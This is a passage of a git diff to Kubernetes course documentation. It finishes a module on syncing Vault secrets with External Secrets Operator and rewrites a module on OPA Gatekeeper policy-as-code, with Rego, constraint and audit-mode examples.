+  -n external-secrets --create-namespace --set installCRDs=true
+```
 
-2. **Create SecretStore** pointing to local Vault:
-   ```yaml
-   # Use token auth for dev (not for production!)
-   apiVersion: external-secrets.io/v1beta1
-   kind: SecretStore
-   metadata:
-     name: vault-dev
-   spec:
-     provider:
-       vault:
-         server: "http://host.docker.internal:8200"  # or your Vault URL
-         path: "secret"
-         version: "v2"
-         auth:
-           tokenSecretRef:
-             name: vault-token
-             key: token
-   ```
+For lab clusters, create a namespaced SecretStore that uses token authentication only long enough to validate sync semantics; production paths should use Kubernetes auth as documented earlier.
 
-3. **Create ExternalSecret** to sync `myapp/config`:
-   ```yaml
-   apiVersion: external-secrets.io/v1beta1
-   kind: ExternalSecret
-   metadata:
-     name: myapp-config
-   spec:
-     refreshInterval: 1m
-     secretStoreRef:
-       name: vault-dev
-       kind: SecretStore
-     target:
-       name: myapp-config
-     dataFrom:
-     - extract:
-         key: myapp/config
-   ```
-
-4. **Verify** the Kubernetes Secret was created:
-   ```bash
-   kubectl get secret myapp-config -o yaml
-   ```
-
-### Success Criteria
-- [ ] ESO controller running in `external-secrets` namespace
-- [ ] SecretStore shows `Valid: True`
-- [ ] ExternalSecret shows `SecretSynced: True`
-- [ ] Kubernetes Secret contains both `database_url` and `api_key`
-- [ ] Values match what's in Vault
-
-### Bonus Challenge
-Update the secret in Vault and verify ESO syncs the change within the refresh interval.
-
+```yaml
+apiVersion: external-secrets.io/v1beta1
+kind: SecretStore
+metadata:
+  name: vault-dev
+spec:
+  provider:
+    vault:
+      server: "http://host.docker.internal:8200"
+      path: "secret"
+      version: "v2"
+      auth:
+        tokenSecretRef:
+          name: vault-token
+          key: token
 ---
+apiVersion: external-secrets.io/v1beta1
+kind: ExternalSecret
+metadata:
+  name: myapp-config
+spec:
+  refreshInterval: 1m
+  secretStoreRef:
+    name: vault-dev
+    kind: SecretStore
+  target:
+    name: myapp-config
+  dataFrom:
+  - extract:
+      key: myapp/config
+```
 
-## Further Reading
+After applying manifests, confirm reconciliation by inspecting ExternalSecret conditions and comparing decoded Secret keys against the Vault KV entries you created in the setup step.
 
-- [Vault Documentation](https://developer.hashicorp.com/vault/docs)
-- [External Secrets Operator Docs](https://external-secrets.io/)
-- [Vault Best Practices](https://developer.hashicorp.com/vault/tutorials/operations/production-hardening)
+```bash
+kubectl get externalsecrets
+kubectl describe externalsecret myapp-config
+kubectl get secret myapp-config -o yaml
+```
+
+Mark the lab complete when all of the following success criteria pass; repeat the Vault KV update test to prove refreshInterval behavior rather than assuming one-time sync.
+
+Success criteria:
+
+- [ ] ESO controller pods are Running in `external-secrets`
+- [ ] `SecretStore` status reports valid provider configuration
+- [ ] `ExternalSecret` condition shows `SecretSynced=True`
+- [ ] Native Secret contains `database_url` and `api_key` matching Vault KV
+- [ ] Updating Vault KV and waiting one `refreshInterval` updates the native Secret
 
 ---
 
 ## Next Module
 
-Continue to [Module 4.2: OPA & Gatekeeper](../module-4.2-opa-gatekeeper/) to learn policy-as-code for Kubernetes admission control.
+Continue to [Module 4.2: OPA & Gatekeeper](../module-4.2-opa-gatekeeper/) for policy-as-code admission control—secrets management ensures only authorized workloads receive credentials; admission policies ensure only compliant workloads run at all.
 
 ---
 
-*"The only secure secret is the one that doesn't exist. For everything else, there's Vault."*
-
 ## Sources
 
-- [Vault: How Vault Works](https://developer.hashicorp.com/vault/docs/about-vault/how-vault-works) — Best primary source for Vault architecture, auth, policies, audit logging, seals, and secret engines.
-- [Vault: Kubernetes Auth Method](https://developer.hashicorp.com/vault/docs/auth/kubernetes) — Directly relevant to configuring Vault authentication for Kubernetes workloads.
-- [External Secrets Operator](https://github.com/external-secrets/external-secrets) — Canonical upstream overview for how ESO syncs third-party secret backends into Kubernetes Secrets.
+- [Kubernetes: Encrypting Secret Data at Rest](https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/) — Official guide to `EncryptionConfiguration`, KMS providers, and etcd encryption scope.
+- [External Secrets Operator Overview](https://external-secrets.io/latest/introduction/overview/) — Upstream introduction to sync controllers and provider model.
+- [ESO SecretStore API](https://external-secrets.io/latest/api/secretstore/) — Reference for namespaced and cluster-scoped store connectivity.
+- [ESO ExternalSecret API](https://external-secrets.io/latest/api/externalsecret/) — Reference for sync intervals, templating, and ownership policies.
+- [ESO HashiCorp Vault Provider](https://external-secrets.io/latest/provider/hashicorp-vault/) — Vault-specific auth and path configuration for ESO.
+- [Vault KV Secrets Engine v2](https://developer.hashicorp.com/vault/docs/secrets/kv/kv-v2) — Versioning, metadata paths, and delete semantics.
+- [Vault Database Secrets Engine](https://developer.hashicorp.com/vault/docs/secrets/databases) — Dynamic credential generation, TTL, and revocation.
+- [Vault Kubernetes Auth Method](https://developer.hashicorp.com/vault/docs/auth/kubernetes) — TokenReview integration, roles, and audience validation.
+- [Vault Agent Injector on Kubernetes](https://developer.hashicorp.com/vault/docs/platform/k8s/injector) — Sidecar injection pattern without native Secrets.
+- [Secrets Store CSI Driver Introduction](https://secrets-store-csi-driver.sigs.k8s.io/introduction) — Mount-time secret retrieval and provider plugins.
+- [Sealed Secrets (Bitnami Labs)](https://github.com/bitnami-labs/sealed-secrets) — Encrypted-in-Git controller for Kubernetes.
+- [Mozilla SOPS](https://github.com/getsops/sops) — Encrypts structured files with age/PGP for GitOps workflows.
+- [OpenBao Documentation](https://openbao.org/docs/) — MPL-licensed Vault-compatible secrets management fork.
+- [CNCF External Secrets Project Page](https://www.cncf.io/projects/external-secrets/) — Sandbox acceptance date and project description.
+- [IBM Completes Acquisition of HashiCorp (2025-02-27)](https://newsroom.ibm.com/2025-02-27-ibm-completes-acquisition-of-hashicorp,-creates-comprehensive,-end-to-end-hybrid-cloud-platform) — Corporate ownership context for HashiCorp products.
+- [Vault License FAQ](https://developer.hashicorp.com/vault/docs/license) — BSL terms for HashiCorp Vault distribution.

--- a/src/content/docs/platform/toolkits/security-quality/security-tools/module-4.2-opa-gatekeeper.md
+++ b/src/content/docs/platform/toolkits/security-quality/security-tools/module-4.2-opa-gatekeeper.md
@@ -1,29 +1,10 @@
 ---
-revision_pending: true
+revision_pending: false
 title: "Module 4.2: OPA & Gatekeeper"
 slug: platform/toolkits/security-quality/security-tools/module-4.2-opa-gatekeeper
 sidebar:
   order: 3
 ---
-> **Toolkit Track** | Complexity: `[COMPLEX]` | Time: 45-50 minutes
-
-## Overview
-
-"Trust but verify" doesn't work in Kubernetes—you need "deny by default, allow explicitly." This module covers Open Policy Agent (OPA) and Gatekeeper for policy-as-code admission control, helping you enforce security and compliance requirements on the Kubernetes resources your policies match.
-
-**What You'll Learn**:
-- OPA and Rego policy language basics
-- Gatekeeper architecture and constraints
-- Writing effective admission policies
-- Policy testing and CI/CD integration
-
-**Prerequisites**:
-- [Security Principles Foundations](/platform/foundations/security-principles/)
-- Kubernetes admission controllers concept
-- Basic programming logic
-
----
-
 ## What You'll Be Able to Do
 
 After completing this module, you will be able to:
@@ -33,214 +14,109 @@ After completing this module, you will be able to:
 - **Configure Gatekeeper audit mode for policy violation reporting without blocking existing workloads**
 - **Evaluate OPA Gatekeeper against Kyverno for policy-as-code enforcement complexity and flexibility trade-offs**
 
-
 ## Why This Module Matters
 
-Without admission control, anyone with `kubectl create` permissions can deploy anything—privileged containers, images from untrusted registries, pods without resource limits. Gatekeeper acts as your cluster's bouncer, checking every resource against your policies before allowing it in.
+Hypothetical scenario: a platform team supports ten application teams and roughly two hundred Kubernetes manifests spread across service repositories, GitOps overlays, and one emergency operations repository. The team already has pull request checks that catch missing labels, images from unapproved registries, and containers that request privileged mode. That helps, but it does not cover a direct `kubectl apply`, a misconfigured automation token, an old pipeline that skips the new check, or an operator that creates resources from a custom controller. The cluster still needs a final decision point where the API server asks, "Should this object be allowed to exist?"
 
-> 💡 **Did You Know?** Open Policy Agent was created by Styra and [donated to CNCF in 2018](https://www.cncf.io/projects/open-policy-agent-opa/). It's now used beyond Kubernetes—in Terraform, Envoy, Kafka, and even CI/CD pipelines. Learning OPA/Rego is an investment that pays off across the entire cloud-native stack.
+Admission control is that final decision point. Kubernetes checks who the caller is, checks what the caller is allowed to do, and then runs admission before the object is persisted. The [Kubernetes admission controller documentation](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/) describes this placement as after authentication and authorization but before storage. That timing is what makes admission control different from a lint rule. A lint rule advises before the request reaches the cluster; admission control participates in the cluster's own write path.
 
----
+Policy-as-code is the discipline that makes admission control maintainable instead of arbitrary. A platform team should not encode "no privileged pods" as a private memory in one engineer's head, a Slack reminder, or a hand-edited checklist. It should encode the rule as reviewable text, test the rule with known-good and known-bad examples, roll it out in audit or warning mode, and only then make it blocking. The important shift is not the tool name. The important shift is moving from manual approval to automated guardrails that are visible, versioned, and reversible.
 
-## The Admission Control Problem
+OPA Gatekeeper is a worked example of that discipline. [Open Policy Agent](https://www.openpolicyagent.org/docs/policy-language) gives you the Rego policy language and a general-purpose policy engine. [Gatekeeper](https://open-policy-agent.github.io/gatekeeper/website/docs/howto/) connects that policy model to Kubernetes admission by using `ConstraintTemplate` resources for reusable policy logic and `Constraint` resources for scoped, parameterized policy instances. You will use Gatekeeper throughout this module because it exposes the durable mechanics clearly: policy code, parameters, admission decisions, audit results, and progressive enforcement.
 
-```
-WITHOUT POLICY ENFORCEMENT
-════════════════════════════════════════════════════════════════════
+The durable lesson will outlive any single policy engine. Kubernetes now has native [ValidatingAdmissionPolicy](https://kubernetes.io/docs/reference/access-authn-authz/validating-admission-policy/) with CEL, Kyverno provides a YAML and CEL-centered peer that is covered later in [Module 4.7: Kyverno](../module-4.7-kyverno/), and Polaris focuses on workload configuration checks. Your job as a platform engineer is not to memorize a product roster. Your job is to understand where enforcement belongs, how policy should be authored, how rollout risk is reduced, and which tradeoffs matter for a given platform.
 
-Developer kubectl apply ──▶ API Server ──▶ etcd ──▶ 😱 Running
-                                │
-                                │  No checks!
-                                │  - Privileged container? ✓
-                                │  - No resource limits? ✓
-                                │  - Image from docker.io? ✓
-                                │  - Root filesystem writable? ✓
+## Admission Control Is the Last Gate
 
-═══════════════════════════════════════════════════════════════════
+Every write to the Kubernetes API has a path. A caller first presents credentials, the API server authenticates the caller, authorization checks whether that caller may perform the requested verb on the requested resource, and admission decides whether the requested object is acceptable before it is stored. The admission phase is not a substitute for RBAC. RBAC answers "may this subject create pods in this namespace?" Admission answers "is this particular pod acceptable under the rules of this platform?"
 
-WITH GATEKEEPER
-════════════════════════════════════════════════════════════════════
+That distinction matters because many real policies are about object shape, not user identity. A developer may be allowed to create Pods, but not Pods that run privileged containers. A CI service account may be allowed to update Deployments, but not Deployments that use an image registry outside the organization's trusted set. A namespace owner may be allowed to create workloads, but not workloads without `team`, `app`, and `environment` labels. RBAC alone cannot express these object-level constraints with enough precision.
 
-Developer kubectl apply ──▶ API Server ──▶ Gatekeeper ──▶ etcd
-                                │              │
-                                │              │ Check policies:
-                                │              │ - No privileged? ✓
-                                │              │ - Has limits? ✓
-                                │              │ - Allowed registry? ✓
-                                │              │ - Read-only root? ✓
-                                │              │
-                                │              ▼
-                                │    DENY or ALLOW
-                                │
-                                │    If denied:
-                                └──▶ "Error: container must not be privileged"
-```
-
----
-
-## Open Policy Agent (OPA)
-
-### What is OPA?
-
-OPA is a [general-purpose policy engine](https://raw.githubusercontent.com/open-policy-agent/opa/main/README.md). You give it:
-1. **Data** - JSON representing current state
-2. **Query** - What you want to know
-3. **Policy** - Rules written in Rego
+The admission process also has phases. Kubernetes runs mutating admission first, then validating admission. Mutating admission may change an incoming object, often to apply defaults or inject fields. Validating admission observes the final form and may reject it. The same Kubernetes documentation explains that a rejection in either phase rejects the whole request. This ordering means mutation needs extra care: a mutator can make a valid object invalid for a later validator, and multiple mutators can interact in ways that are hard to reason about.
 
 ```
-OPA DECISION FLOW
-════════════════════════════════════════════════════════════════════
+Kubernetes write path, simplified
 
-┌───────────────┐
-│    Policy     │  # Written in Rego
-│  (rules.rego) │
-└───────┬───────┘
-        │
-        ▼
-┌───────────────┐     ┌───────────────┐
-│     OPA       │◀────│    Input      │  # JSON data to evaluate
-│    Engine     │     │   (request)   │
-└───────┬───────┘     └───────────────┘
-        │
-        ▼
-┌───────────────┐
-│   Decision    │  # allow: true/false
-│   (output)    │  # violations: [...]
-└───────────────┘
+caller
+  |
+  v
+authentication
+  |
+  v
+authorization
+  |
+  v
+mutating admission
+  |
+  v
+validating admission
+  |
+  v
+object persisted to etcd
 ```
 
-### Rego Language Basics
+This is why admission belongs in a defense-in-depth design. CI policy checks are still valuable because they give developers fast feedback before a change reaches the cluster. GitOps checks are valuable because they protect the intended deployment path. Admission is valuable because it protects the actual cluster write path. When these layers agree, developers get early feedback and the cluster still has a reliable last gate when a request arrives through another path.
+
+A useful analogy is airport screening. RBAC is the boarding pass check: it confirms that the traveler has permission to enter the secure area. Admission control is the bag scan: it checks the specific thing being brought in. A traveler with a valid boarding pass can still carry an item that is not allowed. A Kubernetes subject with valid create permission can still submit an object that violates platform policy.
+
+The last-gate property also explains why admission policies should be narrow and understandable. A policy that blocks privileged pods, requires labels, or restricts image registries is a good fit because it can be evaluated from the request object and a small amount of policy data. A policy that needs a slow external inventory lookup, an unreliable SaaS endpoint, or a deep chain of business approvals may be better handled before admission, then reinforced at admission with a simpler invariant. Admission is a hot path, not a ticket workflow engine.
+
+## Policy-As-Code Changes The Operating Model
+
+Policy-as-code starts with a social problem: platform rules are easy to invent and hard to operate. A security team may say every workload must run as non-root. A finance team may require cost allocation labels. An operations team may require resource requests for scheduler stability. Each rule is reasonable in isolation, but a cluster with dozens of invisible rules becomes frustrating. Developers need to know what rule failed, why it exists, and what change would satisfy it.
+
+Encoding policy as code gives the rule a lifecycle. The policy can be proposed in a pull request, reviewed by platform and security peers, tested with sample manifests, released first in audit or warning mode, and promoted to denial after the violations are understood. The policy can also be reverted if it causes harm. This is much healthier than a one-time cluster change that only the original author understands.
+
+The most important design choice is to separate policy intent from rollout mode. A policy may express "pods must have team and app labels," but the enforcement action can start as audit or warn. In Gatekeeper, a `Constraint` can use `enforcementAction: dryrun` to record violations without blocking, `warn` to return admission warnings while still allowing the request, or `deny` to block violating requests. The [Gatekeeper constraint violation documentation](https://open-policy-agent.github.io/gatekeeper/website/docs/violations/) describes these modes as supported enforcement actions.
+
+This separation creates a safer rollout sequence. First, apply the policy in audit mode and measure what existing objects violate it. Second, make the message useful enough that a developer can fix the manifest without finding the policy author. Third, move a small scope, such as one namespace or one team, to warnings. Fourth, enforce in scopes where the violation count is low and the exception process is clear. The sequence is slower than flipping directly to deny, but it avoids turning policy work into an outage.
+
+Policy-as-code also needs tests because policy bugs are production bugs. A policy that looks obvious may miss init containers, ignore ephemeral containers, target Pods but not Deployments, or fail when a field is absent. [OPA policy testing](https://www.openpolicyagent.org/docs/policy-testing) provides a framework for testing Rego policies, and [Conftest](https://www.conftest.dev/) applies policy checks to structured configuration such as Kubernetes YAML and Terraform plans. Tests are not paperwork here. They are how you keep guardrails from becoming traps.
+
+The cleanest platform repositories treat policies like shared APIs. Policy names are stable, messages are written for the user, parameters are documented, examples cover both passing and failing inputs, and breaking changes are announced before enforcement changes. This matters because policy is not just code that runs. It is also a contract between the platform team and the teams that use the platform.
+
+## OPA And Rego: The Policy Engine Layer
+
+Open Policy Agent is a general-purpose policy engine, not only a Kubernetes admission controller. It evaluates structured input against policies written in Rego and returns decisions. In a Kubernetes admission use case, the input is an admission review that contains the object under review, the operation, the user information, and related metadata. The policy author writes rules that inspect that input and produce violations when the object does not satisfy the rule.
+
+Rego is declarative, which means a policy describes the conditions that make a result true instead of spelling out a step-by-step procedure. The [OPA policy language documentation](https://www.openpolicyagent.org/docs/policy-language) explains that Rego is designed for reasoning about structured data such as API requests and configuration data. That model fits admission well because Kubernetes resources are structured objects and platform policies usually ask questions about fields in those objects.
+
+The learning curve in Rego is real. Many engineers arrive from imperative languages and expect loops, mutable variables, and early returns. Rego instead uses rules, references, comprehensions, set operations, and expressions that become true or undefined. This is powerful for policy work because a rule can ask for all containers that violate a condition, not just the first one. It also requires disciplined examples and tests so that policy authors understand what the rule is actually selecting.
+
+Here is a small Rego fragment using modern v1 syntax. It is not a complete Gatekeeper template yet; it only shows the shape of a rule that finds containers without a CPU limit. The `violation contains` form builds a set of violation objects, one for each matching container, and the message uses the container name so the person fixing the manifest can find the problem quickly.
 
 ```rego
-# Rego 101 - The Policy Language
+package k8scontainerlimits
 
-# Package declaration (namespace for rules)
-package kubernetes.admission
-
-# Import statements
-import future.keywords.in
-import future.keywords.contains
-import future.keywords.if
-
-# Constants
-allowed_registries := ["gcr.io", "registry.example.com"]
-
-# Rules - evaluate to true/false or a set of values
-
-# Simple boolean rule
-is_privileged if {
-    input.request.object.spec.containers[_].securityContext.privileged == true
-}
-
-# Rule with iteration (for each container)
-violation contains msg if {
-    container := input.request.object.spec.containers[_]
-    not container.resources.limits.cpu
-    msg := sprintf("Container '%v' has no CPU limit", [container.name])
-}
-
-# Rule with comprehension
-all_container_images := [image |
-    container := input.request.object.spec.containers[_]
-    image := container.image
-]
-
-# Helper function
-starts_with_allowed_registry(image) if {
-    some registry in allowed_registries
-    startswith(image, registry)
+violation contains {"msg": msg} if {
+  container := input.review.object.spec.containers[_]
+  not container.resources.limits.cpu
+  msg := sprintf("container %q must set resources.limits.cpu", [container.name])
 }
 ```
 
-### Key Rego Concepts
+Good Rego policies are small, composable, and explicit about the resource shape they expect. A policy that checks Pods can read `input.review.object.spec.containers`. A policy that checks Deployments must read `input.review.object.spec.template.spec.containers`. A policy that claims to check "workloads" needs helper rules that normalize Pods, Deployments, StatefulSets, DaemonSets, Jobs, and CronJobs into a common container list. Otherwise the policy passes tests for one kind and silently misses another kind.
 
-| Concept | Example | Description |
-|---------|---------|-------------|
-| **Unification** | `x := input.name` | Assignment with pattern matching |
-| **Iteration** | `containers[_]` | Iterate over array elements |
-| **Comprehension** | `[x \| x := arr[_]]` | Build arrays/sets from iteration |
-| **some** | `some i; arr[i]` | Explicit iteration variable |
-| **contains** | `set contains msg if {...}` | Add to set when condition true |
-| **default** | `default allow := false` | Default value if rule undefined |
+The strongest Rego policy authors write helper rules before clever one-liners. A helper named `containers contains container if { ... }` communicates intent. A helper named `allowed_registry(image)` makes the main violation rule easier to read. If a reviewer can understand the policy without mentally simulating every reference, the policy is safer to operate. Admission policy is not a code golf contest; the target reader is the next person debugging a blocked rollout.
 
-> 💡 **Did You Know?** Rego is OPA's declarative policy language, designed for policy evaluation over structured data.
+## Gatekeeper's Template And Constraint Model
 
----
+Gatekeeper maps OPA policy into Kubernetes resources through the constraint framework. A `ConstraintTemplate` defines the reusable policy type. It contains the policy code, the schema for parameters, and the Kubernetes kind that will be created for concrete constraints. A `Constraint` is an instance of that type. It supplies parameters, match rules, and enforcement action. The [Gatekeeper constraint template documentation](https://open-policy-agent.github.io/gatekeeper/website/docs/constrainttemplates/) describes this split as policy code plus the schema of the accompanying constraint object.
 
-## Gatekeeper
+The template and constraint split is the durable model to remember. A template is like a function definition: "given a set of required labels, report missing labels." A constraint is like a function call: "require `team` and `app` labels for Pods in namespaces labeled for enforcement." This split lets one platform team maintain the policy logic while different teams or environments use different parameters and scopes.
 
-### Architecture
-
-```
-GATEKEEPER ARCHITECTURE
-════════════════════════════════════════════════════════════════════
-
-┌─────────────────────────────────────────────────────────────────┐
-│                    Kubernetes Cluster                            │
-│                                                                  │
-│  kubectl apply ──▶ API Server                                   │
-│                         │                                        │
-│                         │ ValidatingAdmissionWebhook            │
-│                         ▼                                        │
-│  ┌────────────────────────────────────────────────────────────┐ │
-│  │                    GATEKEEPER                               │ │
-│  │                                                             │ │
-│  │  ┌─────────────────┐     ┌─────────────────┐              │ │
-│  │  │ Constraint      │     │    OPA Engine   │              │ │
-│  │  │ Templates       │────▶│                 │              │ │
-│  │  │ (Rego policies) │     │  Evaluate       │              │ │
-│  │  └─────────────────┘     │  Request        │              │ │
-│  │                          └────────┬────────┘              │ │
-│  │  ┌─────────────────┐              │                       │ │
-│  │  │ Constraints     │──────────────┘                       │ │
-│  │  │ (policy params) │                                      │ │
-│  │  └─────────────────┘                                      │ │
-│  │                                                             │ │
-│  └────────────────────────────────────────────────────────────┘ │
-│                         │                                        │
-│                         ▼                                        │
-│               Allow or Deny + Message                           │
-│                                                                  │
-└─────────────────────────────────────────────────────────────────┘
-```
-
-### Key Components
-
-| Component | Purpose | Example |
-|-----------|---------|---------|
-| **ConstraintTemplate** | Defines reusable policy logic (Rego) | "Container must have resource limits" |
-| **Constraint** | Instance of template with parameters | "Apply to namespace 'prod', require CPU/memory" |
-| **Config** | Gatekeeper settings | Exempt namespaces, audit interval |
-
-### Installation
-
-```bash
-# Install Gatekeeper
-kubectl apply -f https://raw.githubusercontent.com/open-policy-agent/gatekeeper/v3.14.0/deploy/gatekeeper.yaml
-
-# Verify installation
-kubectl get pods -n gatekeeper-system
-
-# Check webhook is registered
-kubectl get validatingwebhookconfigurations
-```
-
----
-
-## Writing Policies
-
-### ConstraintTemplate Structure
+The following template uses Gatekeeper's `ConstraintTemplate` API with Rego v1 syntax. It requires a `labels` parameter array and reports missing labels on the submitted object. The policy uses `object.get` to treat a missing `metadata.labels` map as an empty object, which avoids a common bug where the policy errors or becomes undefined when the whole labels map is absent.
 
 ```yaml
 apiVersion: templates.gatekeeper.sh/v1
 kind: ConstraintTemplate
 metadata:
-  name: k8srequiredlabels  # lowercase, no spaces
+  name: k8srequiredlabels
 spec:
   crd:
     spec:
       names:
-        kind: K8sRequiredLabels  # CamelCase
+        kind: K8sRequiredLabels
       validation:
         openAPIV3Schema:
           type: object
@@ -251,275 +127,87 @@ spec:
                 type: string
   targets:
   - target: admission.k8s.gatekeeper.sh
-    rego: |
-      package k8srequiredlabels
+    code:
+    - engine: Rego
+      source:
+        version: "v1"
+        rego: |
+          package k8srequiredlabels
 
-      violation[{"msg": msg}] {
-        # Get provided labels
-        provided := {label | input.review.object.metadata.labels[label]}
-
-        # Get required labels
-        required := {label | label := input.parameters.labels[_]}
-
-        # Find missing
-        missing := required - provided
-        count(missing) > 0
-
-        msg := sprintf("Missing required labels: %v", [missing])
-      }
+          violation contains {"msg": msg} if {
+            required := {label | some label in input.parameters.labels}
+            provided := object.get(input.review.object.metadata, "labels", {})
+            missing := required - {label | provided[label]}
+            count(missing) > 0
+            msg := sprintf("missing required labels: %v", [missing])
+          }
 ```
 
-### Constraint Usage
+A matching constraint chooses where that policy applies. This example starts in `dryrun`, matches namespaced Pods, and uses a namespace selector so the rollout can be controlled with a namespace label. The Gatekeeper `match` field supports matchers such as kinds, scope, namespaces, excluded namespaces, label selectors, and namespace selectors. The scope matters because cluster-scoped resources do not behave like namespace-scoped resources, and accidental cluster-wide matching is a common source of noisy audits.
 
 ```yaml
 apiVersion: constraints.gatekeeper.sh/v1beta1
 kind: K8sRequiredLabels
 metadata:
-  name: require-team-label
+  name: require-team-and-app
 spec:
+  enforcementAction: dryrun
   match:
+    scope: Namespaced
     kinds:
     - apiGroups: [""]
       kinds: ["Pod"]
-    - apiGroups: ["apps"]
-      kinds: ["Deployment", "StatefulSet"]
-    namespaces:
-    - "production"
-    excludedNamespaces:
-    - "kube-system"
+    namespaceSelector:
+      matchLabels:
+        policy.kubedojo.io/enforce: "true"
   parameters:
     labels:
-    - "team"
-    - "app"
+    - team
+    - app
 ```
 
-### Common Policy Patterns
+The practical design question is not "can this policy be written?" Most policies can be written somehow. The question is "will this policy be understandable, testable, and supportable when it blocks a real deployment?" A required-label policy is easy to reason about. A policy that checks every image tag against an external vulnerability service during admission is harder because the admission path now depends on another service's latency and availability.
 
-```yaml
-# 1. Require Container Resource Limits
-apiVersion: templates.gatekeeper.sh/v1
-kind: ConstraintTemplate
-metadata:
-  name: k8scontainerlimits
-spec:
-  crd:
-    spec:
-      names:
-        kind: K8sContainerLimits
-  targets:
-  - target: admission.k8s.gatekeeper.sh
-    rego: |
-      package k8scontainerlimits
+Gatekeeper also ships a community-owned [Gatekeeper Library](https://open-policy-agent.github.io/gatekeeper-library/website/) with reusable policies. Treat a library policy as a starting point, not a magic import. Read the template, understand which resource kinds it covers, check whether it handles init and ephemeral containers, and write local tests for your exact parameters. Library policies save time, but they do not remove responsibility for rollout and user-facing messages.
 
-      violation[{"msg": msg}] {
-        container := input.review.object.spec.containers[_]
-        not container.resources.limits.cpu
-        msg := sprintf("Container '%v' has no CPU limit", [container.name])
-      }
+## Audit, Warn, And Enforce
 
-      violation[{"msg": msg}] {
-        container := input.review.object.spec.containers[_]
-        not container.resources.limits.memory
-        msg := sprintf("Container '%v' has no memory limit", [container.name])
-      }
----
-# 2. Allowed Container Registries
-apiVersion: templates.gatekeeper.sh/v1
-kind: ConstraintTemplate
-metadata:
-  name: k8sallowedrepos
-spec:
-  crd:
-    spec:
-      names:
-        kind: K8sAllowedRepos
-      validation:
-        openAPIV3Schema:
-          type: object
-          properties:
-            repos:
-              type: array
-              items:
-                type: string
-  targets:
-  - target: admission.k8s.gatekeeper.sh
-    rego: |
-      package k8sallowedrepos
+Admission enforcement only sees requests that pass through admission after the policy exists. That means it cannot, by itself, discover every object that was already in the cluster. Gatekeeper's [audit documentation](https://open-policy-agent.github.io/gatekeeper/website/docs/audit/) explains that audit performs periodic evaluations of existing resources against constraints and records pre-existing misconfigurations. This is the bridge between admission-time prevention and cluster-state visibility.
 
-      violation[{"msg": msg}] {
-        container := input.review.object.spec.containers[_]
-        not image_allowed(container.image)
-        msg := sprintf("Container '%v' uses image '%v' from disallowed registry", [container.name, container.image])
-      }
+Audit mode is where mature teams spend time before they enforce. If a policy requires labels, audit tells you which existing Pods or controllers are missing labels. If a policy restricts image registries, audit shows which existing images are outside the proposed allowlist. The result is not only a technical report. It is the migration plan for teams that need to update manifests before enforcement becomes blocking.
 
-      image_allowed(image) {
-        repo := input.parameters.repos[_]
-        startswith(image, repo)
-      }
----
-# 3. Block Privileged Containers
-apiVersion: templates.gatekeeper.sh/v1
-kind: ConstraintTemplate
-metadata:
-  name: k8sblockprivileged
-spec:
-  crd:
-    spec:
-      names:
-        kind: K8sBlockPrivileged
-  targets:
-  - target: admission.k8s.gatekeeper.sh
-    rego: |
-      package k8sblockprivileged
+The rollout path should be explicit and boring. Start with a constraint in `dryrun`, review `status.violations`, and fix the biggest categories. Move to `warn` if you want admission-time feedback without blocking. Promote to `deny` after the violation set is small, the message is clear, and there is an exception path for legitimate edge cases. If the platform cannot explain how to get an exception, the platform is not ready to enforce.
 
-      violation[{"msg": msg}] {
-        container := input.review.object.spec.containers[_]
-        container.securityContext.privileged == true
-        msg := sprintf("Container '%v' must not run as privileged", [container.name])
-      }
-
-      violation[{"msg": msg}] {
-        container := input.review.object.spec.initContainers[_]
-        container.securityContext.privileged == true
-        msg := sprintf("Init container '%v' must not run as privileged", [container.name])
-      }
-```
-
-> 💡 **Did You Know?** Gatekeeper includes the [Gatekeeper Library](https://open-policy-agent.github.io/gatekeeper-library/), a collection of reusable policies and examples for common Kubernetes security and policy patterns.
-
----
-
-## Policy Testing
-
-### Testing Rego Locally
+Here are the operational commands you will use most often after a constraint is installed. They are intentionally simple because incident response is not the time to remember a complex query. The first command lists constraint kinds, the second inspects the concrete constraint, and the third reads Gatekeeper logs when you need controller-level context.
 
 ```bash
-# Install OPA CLI
-brew install opa  # or download from https://www.openpolicyagent.org/
-
-# Create test file
-cat > policy_test.rego << 'EOF'
-package k8sallowedrepos
-
-test_allowed_registry {
-    image_allowed("gcr.io/my-project/app:v1") with input.parameters.repos as ["gcr.io/"]
-}
-
-test_disallowed_registry {
-    not image_allowed("docker.io/nginx:latest") with input.parameters.repos as ["gcr.io/"]
-}
-EOF
-
-# Run tests
-opa test . -v
+kubectl get constraints
+kubectl get k8srequiredlabels require-team-and-app -o yaml
+kubectl logs -n gatekeeper-system -l control-plane=controller-manager --tail=100
 ```
 
-### Gatekeeper Dry-Run Mode
+Audit also has performance implications. Gatekeeper can query the API during each audit cycle, and it can use a cache when configured for cache-based audit. A platform with many resources and many constraints should test audit cost before assuming every policy can scan every resource frequently. Admission latency and audit cost are separate concerns, but both become part of the operating budget for policy-as-code.
+
+The right mental model is "observe before enforce." A policy that blocks new privileged Pods is usually reasonable. A policy that blocks updates to every old Deployment until the old manifest is fixed can surprise teams if they need to update an unrelated field during an incident. Audit gives you a way to see the backlog before a deny action turns that backlog into blocked work.
+
+## Mutation: Useful Defaults, Higher Risk
+
+Validation answers yes or no. Mutation changes the object. Gatekeeper supports mutation through separate resources such as `Assign` and `ModifySet`, and its [mutation documentation](https://open-policy-agent.github.io/gatekeeper/website/docs/mutation/) describes mutation policies as separate from validation constraints. That separation is important. A policy that denies a missing label is a different kind of control from a policy that writes a default label into the object.
+
+Mutation is useful when the platform can safely provide a default that the user would have chosen anyway. Examples include setting a default `imagePullPolicy`, adding a harmless label, or setting a pod-level security default for a scoped set of namespaces. Mutation is risky when it hides responsibility, changes application behavior, or creates GitOps drift. If the object stored in the cluster differs from the object in Git, your reconciliation tools may fight the mutator or repeatedly report differences.
+
+This Gatekeeper `Assign` example sets a pod-level `runAsNonRoot` default for matched Pods. It is an illustrative pattern, not a blanket recommendation. You would still need to test workloads that require a specific user, check how the policy interacts with pod and container security contexts, and decide whether mutation or validation gives developers clearer feedback.
 
 ```yaml
-# Test constraint without enforcing
-apiVersion: constraints.gatekeeper.sh/v1beta1
-kind: K8sBlockPrivileged
-metadata:
-  name: block-privileged-dry-run
-spec:
-  enforcementAction: dryrun  # warn or deny for enforcement
-  match:
-    kinds:
-    - apiGroups: [""]
-      kinds: ["Pod"]
-```
-
-```bash
-# Check violations in audit
-kubectl get k8sblockprivileged block-privileged-dry-run -o yaml
-
-# Look at status.violations
-```
-
-### CI/CD Integration
-
-```yaml
-# .github/workflows/policy-test.yaml
